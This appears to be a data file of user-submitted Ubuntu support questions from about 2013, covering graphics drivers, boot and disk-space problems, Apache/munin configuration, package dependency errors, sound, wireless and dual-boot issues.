390997	bold colors not matching text	on ubuntu 13.10 i have my terminal profile preference checked to have bold color same as text color . yet when i run a script to check my colors i get the following output : this is really throwing my vim out of whack as my bold colors are just showing up as an ugly grey color . is there somewhere else this needs to be set ? what is happening here .
390999	activating latest nvidia driver ( 319 ) in ubuntu 12.04.3 caused to boot with a black screen	i 've reinstalled ubuntu 3 times now trying to do this . 'additional drivers ' says i currently have nvidia accelerated graphics driver 304 . however when i activate 319 [ recommended ] , it installed just fine , when i restart , and choose the normal boot from ubuntu 's loader it shows only a black screen with a flashing underscore then just stops . the first time , it was a black screen with a bunch of starting [ service ] services . all of them passed except for loading fallback graphics driver or something along those lines , which failed . i do n't know what to do since i 'm a linux noob who wants to get into ubuntu . how can i fix this issue ?
391001	the 'software updater ' does not have enough disk space on /boot drive	the 'software updater ' states my computer does not have enough disk space on the /boot drive . it instructed me to free up enough space , but i do not have permission to delete any files . what should i do ? also , deleting general files ( pics , videos , etc . ) off my hard drive does not help .
391002	13.10 switching graphics cards	i 'm new to ubuntu , thought i 'd try it and installed the latest version ( 13.10 ) . my laptop has switchable graphics cards , ati ( amd ) and intel , and ubuntu seems to use the intel by default and i can not figure out how to switch to the ati card to save my life . i searched around for hours , but any relevant threads i managed to find were for much earlier versions of ubuntu and seemed outdated . for example , i found some mention of switching cards using ubuntu control center . all download links seem to lead nowhere . the only thing current i found is this : https : //help.ubuntu.com/community/hybridgraphics , which suggests using vga_switcheroo . of course , it tells me that it wo n't work if you boot with nomodeset..which i have to do , otherwise , i get a black screen . so that rules that out . is there any other way i can switch to my ati card ? ( i 'm using the open-source driver , as installing anything else causes problems ) thanks in advance .
391003	computer tryies botting then goes to black screen saying `` pipes broken can not write bytes '' !	i 've been using ubuntu for awhile now and as its booting the sceen goes black and shows the message pipes broken ca n't write bytes .
391009	ubuntu 13.10 32 bit live dvd wont boot ! ca n't even test it out !	ubuntu must have an aversion to older dell computers . i 've tried booting it on 2 different ones i have , and neither will boot . but it will boot on a newer dell pc , go figure . not the one i want to install it on ! ! pc1 : dell dimension 2400 : 2.4 ghz celeron ( p4 ) , 1 gb ram , onboard intel 845 graphics get 's to the `` install or try '' screen . i select `` try '' and 10 mins later i get the red/orange screen with no icons , and clicking the desktop is futile . pc2 : dell dimension 3000 : 2.8 ghz pentium 4 , 1.5 gb ram , onboard intel 845 graphics same results as above . pc3 : dell dimension e520 : 2.66 ghz pentium d ( dual-core ) , 2 gb ram , onboard intel 965 graphics . works fine * i do have to say , this is one of the strangest distro 's of linux i 've ever seen . really have to dig deep to find the apps , and basic things like systeminfo and hardinfo are n't even available ! very inflexible desktop too , but , my girlfriend insists on this distro , for her . please help thanks , wulffie .
391011	idle wo n't open .py files when i use ctrl+o	i 've already tried to get .py files to open with idle by default , but no luck . i 've used every trick you may want to suggest . i really just want to open up idle and from there open a .py file from a dialogue box . all i get when i try is a blank idle screen that wo n't close no matter what i do . i open it via the terminal so all i have to do is force the terminal to close and it goes away . i just want to be able to hit ctrl+o and navigate to my file and have it open in an edit mode so i can hit f5 to run it . anyone have a solution for that ? python 2.7 ubuntu 13.10 running cinnamon .
391012	ca n't update : low space in /boot ( lvm ) - i already cleaned my lubuntu with ubuntu tweak	i have low space on /boot partition and i ca n't update my lubuntu . i have lvm . i deleted old kernels and used ubuntu tweak . i tried to loaded from livecd and with gparted grow up my /boot-size , but gparted not giving me ability to make more space for /boot - only to shrink . i see hidden folder .trash-0 in my /boot with old kernels . i ca n't delete any file in this folder - they are recreating with new number in name . i have empty trash can . how i can delete this files ?
391013	after i install ubuntu the gui doesnt load only command line	i installed ubuntu and it said it successfully installed . i restarted on it gives me an error saying `` kvm : microcode failed `` and then some file location and after that it loads the command line . i can execute commands from there
391014	ubuntu 13.10 munin 403 error , already replaced 'allow from ' with 'require '	i just upgraded my instance of ubuntu server from 12.10 to 13.10 and i ca n't access munin anymore . i had the issue with apache2.4 where some options have changed and have applied the fixes suggested here : ubuntu 13.10 server - 403 error after upgrading to apache2.4 and here : http : //stackoverflow.com/questions/9127802/munin-server-with-apache-you-dont-have-permission-to-access-munin-on-this-se doing that got most of my other other sites back up , but munin is still giving me a 403 error . i then tried a full purge of munin and it 's config files and a re-install , re-applied the apache2.4 fix , and it is still giving me the 403 error . in the error log for munin i get this : [ sat dec 14 21:42:13.458130 2013 ] [ authz_core : error ] [ pid 29896 ] [ client 192.168.1.1:57620 ] ah01630 : client denied by server configuration : /usr/lib/munin/cgi/munin-cgi-html [ sat dec 14 21:42:13.865968 2013 ] [ authz_core : error ] [ pid 29896 ] [ client 192.168.1.1:57620 ] ah01630 : client denied by server configuration : /etc/munin/static/favicon.ico i tried accessing munin by forwarding a port to the server and trying to access it through a local connection , but no success there . here is what my /etc/munin/apache.conf currently looks like : # enable this for template generation alias /munin /var/cache/munin/www # enable this for cgi-based templates # alias /munin-cgi/static /var/cache/munin/www/static # scriptalias /munin-cgi /usr/lib/munin/cgi/munin-cgi-html # < location /munin-cgi > # order allow , deny # allow from localhost 127.0.0.0/8 : :1 # authuserfile /etc/munin/munin-htpasswd # authname `` munin '' # authtype basic # require valid-user # < /location > < directory /var/cache/munin/www > # order allow , deny # allow from localhost 127.0.0.0/8 : :1 require all granted options followsymlinks symlinksifownermatch # this file can be used as a .htaccess file , or a part of your apache # config file . # # for the .htaccess file option to work the munin www directory # ( /var/cache/munin/www ) must have `` allowoverride all '' or something # close to that set . # # authuserfile /etc/munin/munin-htpasswd # authname `` munin '' # authtype basic # require valid-user # this next part requires mod_expires to be enabled . # # set the default expiration time for files to 5 minutes 10 seconds from # their creation ( modification ) time . there are probably new files by # that time . # < ifmodule mod_expires.c > expiresactive on expiresdefault m310 < /ifmodule > < /directory > # enables fastcgi for munin-cgi-html if present # < location /munin-cgi > # < ifmodule mod_fastcgi.c > # sethandler fastcgi-script # < /ifmodule > # < /location > # < location /munin-cgi/static > # sethandler none # < /location > # enables fastcgi for munin-cgi-graph if present scriptalias /munin-cgi/munin-cgi-graph /usr/lib/munin/cgi/munin-cgi-graph < location /munin-cgi/munin-cgi-graph > # order allow , deny # allow from localhost 127.0.0.0/8 : :1 require all granted # authuserfile /etc/munin/munin-htpasswd # authname `` munin '' # authtype basic # require valid-user < ifmodule mod_fcgid.c > sethandler fcgid-script < /ifmodule > < ifmodule ! mod_fcgid.c > sethandler cgi-script < /ifmodule > < /location > scriptalias /munin-cgi/munin-cgi-html /usr/lib/munin/cgi/munin-cgi-html < location /munin-cgi/munin-cgi-html > # order allow , deny # allow from localhost 127.0.0.0/8 : :1 require all granted # authuserfile /etc/munin/munin-htpasswd # authname `` munin '' # authtype basic # require valid-user < ifmodule mod_fcgid.c > sethandler fcgid-script < /ifmodule > < ifmodule ! mod_fcgid.c > sethandler cgi-script < /ifmodule > < /location >
391015	migration from windows xp	i have started using ubuntu and i 'm very impressed by it 's performance . i want to install lubuntu on a 10 year old pc with a 2.66ghz celeron cpu with 1.5gb of ram . it has pae capabilities . it will only be used for web browsing and office . given that the users are not linux experts and prefer a windows like experience is there any desktop which resembles windows as to make the transition easier ? if i install unity and wine later will that degrade that advantages of lubuntu ? excuse these questions but i am on a learning curve right now . thanks , joseph
391019	wine1.6 : depends : libgettextpo0 but it is not installable	i get this problem every time i try and get wine 1.6 on ubuntu 12.04 . i have no idea how to fix it ! it just says : the following packages have unmet dependencies : wine1.6 : depends : libgettextpo0 but it is not installable depends : wine1.6-i386 ( = 1.7.1-actually1.6-0ubuntu1 ) depends : binfmt-support ( > = 1.1.2 ) but it is not installable recommends : gnome-exe-thumbnailer but it is not going to be installed or kde-runtime but it is not going to be installed recommends : fonts-droid but it is not installable recommends : ttf-mscorefonts-installer but it is not installable recommends : fonts-horai-umefont but it is not installable recommends : fonts-unfonts-core but it is not installable recommends : winbind but it is not going to be installed recommends : winetricks but it is not going to be installed e : unable to correct problems , you have held broken packages .
391020	i messed up my hard drive during a plex media server tutorial . how can i fix this ?	i 'm freaking out ! i was trying to make my drives accessible through plex media server ... i was following the commands on this page link , but i did n't notice/understand that the tutorial was for a partitioned drive ... so while my target hdd was sdb , i was giving commands associated with sbd1 ... the plex media server can now see and access all my hard drives , but they 're not mounted correctly for use within the ubuntu os ... for the past day , i 've been trying to fix my mistakes , but have only made things worse ... i figured i had entered something incorrectly with the fstab text editor , so i started entering the commands for a different tutorial link 2that i thought might help ... except after i had already completed it , i realized that this was to get plex to recognize a windows partition on an hdd ... i 'm such a noob ! i do n't know where to start , so i 'll go ahead and give the output of sudo fdisk -l disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0007f670 device boot start end blocks id system /dev/sda1 * 2048 471801855 235899904 83 linux /dev/sda2 471803902 488396799 8296449 5 extended /dev/sda5 471803904 488396799 8296448 82 linux swap / solaris disk /dev/sdb : 1500.3 gb , 1500301910016 bytes 255 heads , 63 sectors/track , 182401 cylinders , total 2930277168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x47d9be29 device boot start end blocks id system /dev/sdb1 2048 2930274303 1465136128 7 hpfs/ntfs/exfat warning : gpt ( guid partition table ) detected on '/dev/sdc ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdc : 2000.4 gb , 2000398934016 bytes 256 heads , 63 sectors/track , 242251 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdc1 1 4294967295 2147483647+ ee gpt and here is what my text editor for /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=2f16dad8-494b-4cce-b3d6-aead00238b17 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=e881ffcf-37ab-43d1-b1a4-eb00581b7110 none swap sw 0 0 uuid=543e2fd13e2fab46 /media/data ntfs-3g defaults , windows_names , locale=en_us.utf8 0 0
391022	restore the default connection details	how can i restore the default gateway ? i had to make some changes in etc/network/interfaces/ like configure a new interface and new gateway ( this is for a homework ) . i can not change the informations added in etc/network/interfaces because i would lose my points , but i must have my internet connection fixed . how do i do this ?
391024	which files should i look at when changing ubiquity ?	i 've been thinking about changing the qt version of ubiquity to make it easier to use ( `` easier '' in this case meaning not to bring the user to a partition manager when choosing a dual boot option ) . now , i need to figure out which files to change or interface with to do this . i 've looked through some of the source code for ubiquity , but i ca n't seem to figure out which files do what . does anyone know what files i should be looking at ?
391025	can less than a 5 pack for ubuntu advantage desktop be purchased ?	i was wondering if there is anyway to get a single , or maybe 3 pack , no need for 5 ?
391026	headphone sound is one sided in ubuntu 13.10	i am using ubuntu 13.10 64bit . i got one sided ( one channel ) sound only in headphone . laptop speaker is quite good . headphone jack of laptop and headphone are both working well . it 's software issue . i regularly upgrade system and this problem is happening after last 1 or 2 upgrade . also there is a workaround . set the volume level to low and set it high quickly . after doing this couple of times restore my headphone 's both channel . how to solve this permanently ? uname -r 3.11.0-15-generic aplay -l **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : alc270 analog [ alc270 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 cat /proc/asound/version advanced linux sound architecture driver version k3.11.0-15-generic . head -n 1 /proc/asound/card*/codec # * == > /proc/asound/card0/codec # 0 < == codec : realtek alc270 == > /proc/asound/card0/codec # 3 < == codec : intel pantherpoint hdmi pulseaudio -- check [ shows no output . with sudo return permission denied to read home directory ] pulseaudio -- dump-conf # # # read from configuration file : /etc/pulse/daemon.conf # # # daemonize = no fail = yes high-priority = yes nice-level = -11 realtime-scheduling = yes realtime-priority = 5 allow-module-loading = yes allow-exit = yes use-pid-file = yes system-instance = no local-server-type = user cpu-limit = no enable-shm = yes flat-volumes = no lock-memory = no exit-idle-time = 20 scache-idle-time = 20 dl-search-path = /usr/lib/pulse-4.0/modules default-script-file = /etc/pulse/default.pa load-default-script-file = yes log-target = auto log-level = notice resample-method = speex-float-1 enable-remixing = yes enable-lfe-remixing = no default-sample-format = s16le default-sample-rate = 44100 alternate-sample-rate = 48000 default-sample-channels = 2 default-channel-map = front-left , front-right default-fragments = 8 default-fragment-size-msec = 10 enable-deferred-volume = yes deferred-volume-safety-margin-usec = 1 deferred-volume-extra-delay-usec = 0 shm-size-bytes = 0 log-meta = no log-time = no log-backtrace = 0 rlimit-fsize = -1 rlimit-data = -1 rlimit-stack = -1 rlimit-core = -1 rlimit-rss = -1 rlimit-as = -1 rlimit-nproc = -1 rlimit-nofile = 256 rlimit-memlock = -1 rlimit-locks = -1 rlimit-sigpending = -1 rlimit-msgqueue = -1 rlimit-nice = 31 rlimit-rtprio = 9 rlimit-rttime = 1000000 amixer -c 0 simple mixer control 'master',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined playback channels : mono limits : playback 0 - 87 mono : playback 67 [ 77 % ] [ -15.00db ] [ on ] simple mixer control 'headphone',0 capabilities : pvolume pswitch playback channels : front left - front right limits : playback 0 - 87 mono : front left : playback 87 [ 100 % ] [ 0.00db ] [ on ] front right : playback 87 [ 100 % ] [ 0.00db ] [ on ] simple mixer control 'speaker',0 capabilities : pvolume pswitch playback channels : front left - front right limits : playback 0 - 87 mono : front left : playback 0 [ 0 % ] [ -65.25db ] [ off ] front right : playback 0 [ 0 % ] [ -65.25db ] [ off ] simple mixer control 'pcm',0 capabilities : pvolume playback channels : front left - front right limits : playback 0 - 255 mono : front left : playback 255 [ 100 % ] [ 0.00db ] front right : playback 255 [ 100 % ] [ 0.00db ] simple mixer control 'mic',0 capabilities : pvolume pswitch playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 0 [ 0 % ] [ -34.50db ] [ off ] front right : playback 0 [ 0 % ] [ -34.50db ] [ off ] simple mixer control 'mic boost',0 capabilities : volume playback channels : front left - front right capture channels : front left - front right limits : 0 - 3 front left : 3 [ 100 % ] [ 36.00db ] front right : 3 [ 100 % ] [ 36.00db ] simple mixer control 'iec958',0 capabilities : pswitch pswitch-joined playback channels : mono mono : playback [ off ] simple mixer control 'capture',0 capabilities : cvolume cswitch capture channels : front left - front right limits : capture 0 - 31 front left : capture 18 [ 58 % ] [ 10.50db ] [ on ] front right : capture 18 [ 58 % ] [ 10.50db ] [ on ] simple mixer control 'auto-mute mode',0 capabilities : enum items : 'disabled ' 'enabled' item0 : 'enabled' simple mixer control 'digital',0 capabilities : cvolume capture channels : front left - front right limits : capture 0 - 120 front left : capture 60 [ 50 % ] [ 0.00db ] front right : capture 60 [ 50 % ] [ 0.00db ] pacmd dump-volumes no pulseaudio daemon running , or not running as session daemon . sudo pactl info server string : unix : /run/user/1000/pulse/native library protocol version : 28 server protocol version : 28 is local : yes client index : 28 tile size : 65472 user name : shantanu host name : shantanu-voillo server name : pulseaudio server version : 4.0 default sample specification : s16le 2ch 44100hz default channel map : front-left , front-right default sink : alsa_output.pci-0000_00_1b.0.analog-stereo default source : alsa_input.pci-0000_00_1b.0.analog-stereo cookie : 381c : e256
391031	really messed up the grub file	i 'm having problems with my dual boot system . i just bought an asus laptop with windows 8 pre-installed and installed ubuntu ( change bios to legacy mode ) . i did something that i shouldnt ' have ( i do n't think it 's important to focus on that at this point ) so i ended up doing a fresh install . ubuntu works perfectly but now i ca n't see the windows entry on the grub menu when booting . i tried to run boot repair but i get this message saying that it needs to umount a partition , and keeps doing that endlessly the boot repair log is http : //paste.ubuntu.com/6575169/ the sudo update-grub output is http : //paste.ubuntu.com/6576586/ and the /boot/grub/grub.cfg files is here any suggestion ? thanks
391036	ubuntu one sync takes too long !	i have ubuntu one on 2 computers , home + work . ( using 3gb of 25gb available ) . it eventually does sync my files , sometimes fast ( < 1min ) , sometimes toooo long ... days . the computers are almost constantly on and online . i often have to ssh login to one of them to fetch files witch should have been syncd , causing conflict prolems ... very annoying . how fast is ubu one expected to sync ? what can i do to get it within reasonable times ? the files are n't that big . best comp1 : win 7 comp2 : ubu 12.04
391041	windows time resets even when doing the fix	i am dualbooting ubuntu 13.10 and windows 7 . when i boot into ubuntu and then into windows , the windows time is +2 hours of the correct time . i know this has to do with the way the operating systems handle bios time . for ubuntu it is utc and for windows is local time . so i searched about it and found that i need to make a .reg file with these contents and then run it . windows registry editor version 5.00 [ hkey_local_machine\system\currentcontrolset\control\timezoneinformation ] `` realtimeisuniversal '' =dword:00000001 but it does n't work . even if i do it , after some time windows changes the clock again to +2 hours ... i also tried rebooting immediately after doing the fix , but still nothing .
391043	get internet radio url	i am desperatly looking for the direct url to the internet radio ( http : //deluxemusic.tv/radio_en/ ) , i have even tried to look in the html code , but i did not find it . tanks a lot in advance , wertzu
391044	cant install awuso36nhr alfa dongle driver	wondered if any of you fine people could give me a hand by helping me resolve my problem of trying to get the awuso36nhr alfa dongle drivers installed from disc . i have trawled the net trying to find a resolution to this issue but have not found any solution for this particular dongle and driver for linux if anyone can help i would be extremely grateful thanks a very desperate noob to linux
391045	heap issue in android soucre code development	i am trying to work on android source code , for that i am using eclipse but this tool is given me heap error when i am trying to build my project . so i did the changes as per google document but still facing same error . http : //source.android.com/source/using-eclipse.html any one tell me why this is happens and how to solve this issue ? ? any suggestion would be appreciated
391046	how do i use proprietary nvidia drivers ? is optimus still a problem ( without bumblebee ) ?	i am using a nvidia gt 630m card ( on a lenovo g580 ) which probably uses optimus since the intel integrated graphics show up . i am somewhat new to linux and installed ubuntu 13.10 . system settings - > software & updates - > additional drivers shows me i am not using proprietary drivers and there are no available . however i did download the 331.20 driver from nvidia but i am not sure how to install it and if this is the smart way ( no packages/updates ! ? ) . what is the correct and easy way to install the proprietary drivers ? can i use the software center ? is optimus still a big problem ? do not the 331 and 319 drivers have optimus support for linux ? if optimus is a problem : is there a way to manually switch between intel and nvidia graphics ( which would be the easiest way in my opinion ) ? is there another way to deal without bumblebee ? how do i enable nvidia card for steam games with bumblebee ?
391048	not able to add canon mf4570dw scanner	i have installed the driver for my printer mf4570dw from canon official site and i am able to print from it over the wifi network , but the problem arose when i tried to scan from the same . firstly i tried the simple scan which comes with the ubuntu 13.10 , but it fails to detect any scanner . secondly i installed the xsane the same issue arose there also no device found . i searched a lot but unable to find a solution .
391051	ubuntu 13.10 wo n't suspend	have been thru several threads with similar issues , but no resolution . asus x201e , freshly upgraded to ubuntu 13.10 . suspend from any menu does not work since upgrade . when i select `` suspend '' from the top right-hand menu , the screen goes black for a second , then wakes right back up . /var/log/pm-suspend.log is here : http : //paste.ubuntu.com/6577211/ significant chunk : running hook /usr/lib/pm-utils/sleep.d/55networkmanager suspend suspend : having networkmanager put all interaces to sleep ... failed . /usr/lib/pm-utils/sleep.d/55networkmanager suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/60_wpa_supplicant suspend suspend : failed to connect to wpa_supplicant - wpa_ctrl_open : no such file or directory i get sigsegv crashes from wpa_supplicant ( and plymouthd ) on boot . suspend does work via these commands , cribbed from another thread : sudo bash -c `` echo shutdown > /sys/power/disk '' sudo bash -c `` echo mem > /sys/power/state '' but i do n't know why / what this means . any ideas ?
391053	ubuntu 13.10 - no wireless networks detected	i made a bootable usb of ubuntu 13.10 to try it before installing . right from the start no wireless networks are being detected or shown in the list . i do n't have a wired connection . `` enable networking '' and `` enable wireless '' options are enabled.i tried it another system but there is no such problem in that system . both systems use atheros ar9285 wireless adapter . so , i made ubuntu 12.04 bootable usb and tried it . the same problem exists and as soon as the system starts it says `` network disconnected , you are now offline '' . i am a newbie and i do n't know what the problem is . i restarted the network manager also but it did n't work . iwconfig eth0 : no wireless extensions . lo : no wireless extensions . wlan0 : ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off rfkill list all 0 : hp-wifi : wireless lan soft blocked : no hard blocked : no 1 : hp-bluetooth : bluetooth soft blocked : yes hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : no
391055	cant connect to tv with vga cable . acer aspire 4520 , 12.04lts	when i connect my tv to my laptop with a vga cable it does not detect an input . here is some info but not sure what it means mark @ mark-aspire-4520 : ~ $ xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 320 x 240 , current 1280 x 800 , maximum 1280 x 800 default connected 1280x800+0+0 0mm x 0mm 1280x800 50.0* 1024x768 51.0 840x525 52.0 800x600 53.0 800x512 54.0 720x450 55.0 680x384 56.0 57.0 640x512 58.0 640x480 59.0 60.0 576x432 61.0 512x384 62.0 400x300 63.0 320x240 64.0 mark @ mark-aspire-4520 : ~ $ lspci 00:00.0 ram memory : nvidia corporation mcp67 memory controller ( rev a2 ) 00:01.0 isa bridge : nvidia corporation mcp67 isa bridge ( rev a2 ) 00:01.1 smbus : nvidia corporation mcp67 smbus ( rev a2 ) 00:01.2 ram memory : nvidia corporation mcp67 memory controller ( rev a2 ) 00:01.3 co-processor : nvidia corporation mcp67 co-processor ( rev a2 ) 00:02.0 usb controller : nvidia corporation mcp67 ohci usb 1.1 controller ( rev a2 ) 00:02.1 usb controller : nvidia corporation mcp67 ehci usb 2.0 controller ( rev a2 ) 00:04.0 usb controller : nvidia corporation mcp67 ohci usb 1.1 controller ( rev a2 ) 00:04.1 usb controller : nvidia corporation mcp67 ehci usb 2.0 controller ( rev a2 ) 00:07.0 audio device : nvidia corporation mcp67 high definition audio ( rev a1 ) 00:08.0 pci bridge : nvidia corporation mcp67 pci bridge ( rev a2 ) 00:09.0 ide interface : nvidia corporation mcp67 ahci controller ( rev a2 ) 00:0a.0 ethernet controller : nvidia corporation mcp67 ethernet ( rev a2 ) 00:0c.0 pci bridge : nvidia corporation mcp67 pci express bridge ( rev a2 ) 00:0e.0 pci bridge : nvidia corporation mcp67 pci express bridge ( rev a2 ) 00:12.0 vga compatible controller : nvidia corporation c67 [ geforce 7000m / nforce 610m ] ( rev a2 ) 00:18.0 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration 00:18.1 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] address map 00:18.2 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] dram controller 00:18.3 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] miscellaneous control 01:09.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller ( rev 05 ) 01:09.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 22 ) 01:09.2 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 12 ) 01:09.3 system peripheral : ricoh co ltd xd-picture card controller ( rev 12 ) 07:00.0 ethernet controller : qualcomm atheros ar242x / ar542x wireless network adapter ( pci-express ) ( rev 01 ) mark @ mark-aspire-4520 : ~ $ lspci | grep -i vga 00:12.0 vga compatible controller : nvidia corporation c67 [ geforce 7000m / nforce 610m ] ( rev a2 ) mark @ mark-aspire-4520 : ~ $ sudo lshw -c video [ sudo ] password for mark : *-display description : vga compatible controller product : c67 [ geforce 7000m / nforce 610m ] vendor : nvidia corporation physical id : 12 bus info : pci @ 0000:00:12.0 version : a2 width : 64 bits clock : 66mhz capabilities : pm msi vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:23 memory : f3000000-f3ffffff memory : d0000000-dfffffff memory : f2000000-f2ffffff memory : f0000000-f001ffff mark @ mark-aspire-4520 : ~ $ sudo lshw -c video [ sudo ] password for mark : *-display description : vga compatible controller product : c67 [ geforce 7000m / nforce 610m ] vendor : nvidia corporation physical id : 12 bus info : pci @ 0000:00:12.0 version : a2 width : 64 bits clock : 66mhz capabilities : pm msi vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:23 memory : f3000000-f3ffffff memory : d0000000-dfffffff memory : f2000000-f2ffffff memory : f0000000-f001ffff thanks for your help in advance . mark
391056	how to display the choosing mode for ubuntu and windows 7 in my computer when start from boot ?	everyone , i already installed ubuntu in my computer but recently ca n't display the choosing mode in my com after boot started . it 's just directly into windows 7 .
391060	groupwise support on evolution ubuntu 13.10	we want to migrate from windows to ubuntu linux . in the past we used evolution client to our mail server ( novell groupwise 2012 ) . this mail servers uses soap protocol . in the past there was an option to use soap ( groupwise ) in evolution . this seems to be removed . after some googling i came accross this : is groupwise not supported in evolution ? this thread had a solution to patch the latest evolution with soap ( groupwise ) . i tried this on my ubuntu 13.10 but errors occur . this solution was made for ubuntu 11 . these are the steps : 1 . install git ( sudo apt-get install git ) 2. git clone git : //git.gnome.org/evolution-groupwise 3. cd evolution-groupwise 4. git checkout -b 3.2.0-patch evolution_groupwise_3_2_0 5. git cherry-pick 3aae80f55d5fd565274f19210564e74d5350a66c # this is the patch for the soap port bug 6 . open configure.ac , at about line 48 add the line ac_check_lib ( gthread-2.0 , g_thread_init ) 7. sudo apt-get build-dep evolution 8 . ./autogen.sh 9. make 10. sudo make install 11 . edit /etc/services like bruhein describes on step 8 an error occured . configure : error : package requirements ( libedataserverui-3.0 > = 3.2.0 ) were not met : no package 'libedataserverui-3.0 ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables libedataserverui_cflags and libedataserverui_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . then i tried to install the missing dependency without success . root @ ubuntu : ~/evolution-groupwise # apt-get install libedataserverui-3.0-dev reading package lists ... done building dependency tree reading state information ... done package libedataserverui-3.0-dev is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : evolution-data-server-doc e : package 'libedataserverui-3.0-dev ' has no installation candidate can somebody help me with this ? thanks in advance . kr , joeri
391062	solr log error ( vufind install )	how can i solve this log error ? file does not exist : /var/www/solr , referer : 192.168.1.20/vufind/install/fixsolr the path to solar 192.168.1.20:85/solr
391068	what is the use of the *~ files ; are they some kind of default backup in ubuntu/linux ?	i 've noticed this *~ file gets created ( hidden ) whenever i edit a file ; usually text document , scripts . is it some kind of backup ? ! ? as it seems so ... however , i do n't have a backup service configured for such ... so , are those files backup files ? ... like for contents or attributes ? if yes , how can use to restore/recover what the file has to offer ?
391069	how do i add to an already existing file ?	i want to add to a file but when i do the file starts at the end of the last file.i need it to start at the next `` new line ''
391070	not able to install g++ in ubuntu 13.10 because of broken packages	when i try to install g++ in my machine i am getting the following message . support : / $ sudo apt-get install g++ reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : g++ : depends : gcc ( > = 4:4.8.1-2ubuntu3 ) but it is not going to be installed depends : g++-4.8 ( > = 4.8.1-4~ ) but it is not going to be installed depends : gcc-4.8 ( > = 4.8.1-4~ ) but it is not going to be installed e : unable to correct problems , you have held broken packages . i am using ubuntu 13.10 ( saucy ) . i have stuck up with this problem for 2 days now . i know this is a duplicate question but still i am posting it because i could n't find an solution from other similar posts . i have tried all solutions given in package system is broken . how to fix it ? . but it could n't solve the issue . as asked in a comment in ca n't install g++ on 13.10 ( dependency problem ) , im putting the result of apt-cache policy g++ g++-4.8 below g++ : installed : ( none ) candidate : 4:4.8.1-2ubuntu3 version table : 4:4.8.1-2ubuntu3 0 500 http : //de.archive.ubuntu.com/ubuntu/ saucy/main i386 packages g++-4.8 : installed : ( none ) candidate : 4.8.2-1ubuntu1 version table : 4.8.2-1ubuntu1 0 500 http : //ppa.launchpad.net/ubuntu-toolchain-r/test/ubuntu/ saucy/main i386 packages 4.8.1-10ubuntu8 0 500 http : //de.archive.ubuntu.com/ubuntu/ saucy/main i386 packages ps : i am not looking for any particular version of g++ . actual working scenario is i want to install npm package 'libxmljs ' which is dependent on 'node-gyp ' . for 'node-gyp ' to install properly the system should have 'make ' , 'g++ ' and 'python ' . i have make and python in my system . the following is what i get when i run g++ -- version the program 'g++ ' can be found in the following packages : * g++ * pentium-builder try : sudo apt-get install < selected package > please help me to solve the issue .
391072	snd_t4dwave and xubuntu 13.10 - how to get it working ?	i have a problem with sound on my old trident 4dwave-dx . i have that sound card on an lod pc , and there 's no sound . i googled for a solution and found this : http : //manpages.ubuntu.com/manpages/saucy/man4/snd_t4dwave.4freebsd.html but how can i manage to get it working ? how to add it into kernel conf or load into loader.conf as mentioned in the link ? can anyone help me ? i 'm running xubuntu on that pc and i absolutely need it for tomorrow . big thank !
391076	the connection was not supported by ofono	i have lubuntu 13.10 on powermac g4 ( powerpc ) . i installed kubuntu-desktop . then restarted computer . i connect my modem and i am have this error : '' the connection was not supported by ofono '' how to fix this ? previously worked until i installed kubuntu-dekstop .
391077	dual-boot incredibly slow ( windows 7 , ubuntu 13.10 )	i run ubuntu and windows in my latop2 . i had some troubles with gpu drivers ( on both ubuntu and windows ) and had to reinstall grub several times after a windows update mixed up my boot manager . now everything seems to work , except that both systems boot really slow . my ( many years older ) laptop1 boots both systems in 5-10secs , while this brand new laptop2 takes up to 30 seconds - especially windows . it does n't feel right ! any advice ?
